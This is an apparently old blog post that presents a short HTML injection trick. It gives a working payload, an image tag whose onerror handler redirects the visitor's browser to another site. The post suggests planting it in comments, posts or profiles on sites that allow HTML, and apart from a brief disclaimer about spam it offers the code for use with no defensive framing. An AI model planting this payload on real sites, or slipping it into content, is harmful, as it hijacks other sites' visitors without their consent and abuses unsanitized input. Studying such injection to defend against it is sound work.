Search your fish :
    Home | Archives | Disclaimer | About Me | Contact Me
  

HTML Injection with Image Tag

Posted on Saturday, April 26th, 2008 under Internet Security

Well, HMTL can also be dangerous some times, I will not probably talk about how to use this trick, like others I also HATE spam, but here is the code that you can embed in comments, posts or anywhere in your profile where HTML is enabled.

<img src=”http://anysite.com/noimage.jpg” onerror=”window.location.href=’http://www.diggfish.com’;”>

Now, this takes advantage of the function called OnError which means if the image is not found (which obviously isn’t there, the image link you inserted never existed), it will redirect user to diggfish.com



Article Popularity : 33%


If you like this article, please share : These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Furl
  • Spurl
  • StumbleUpon
  • TwitThis
  • co.mments
  • Propeller
  • Reddit
  • Technorati

Random Posts

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading ... Loading ...

Leave a Reply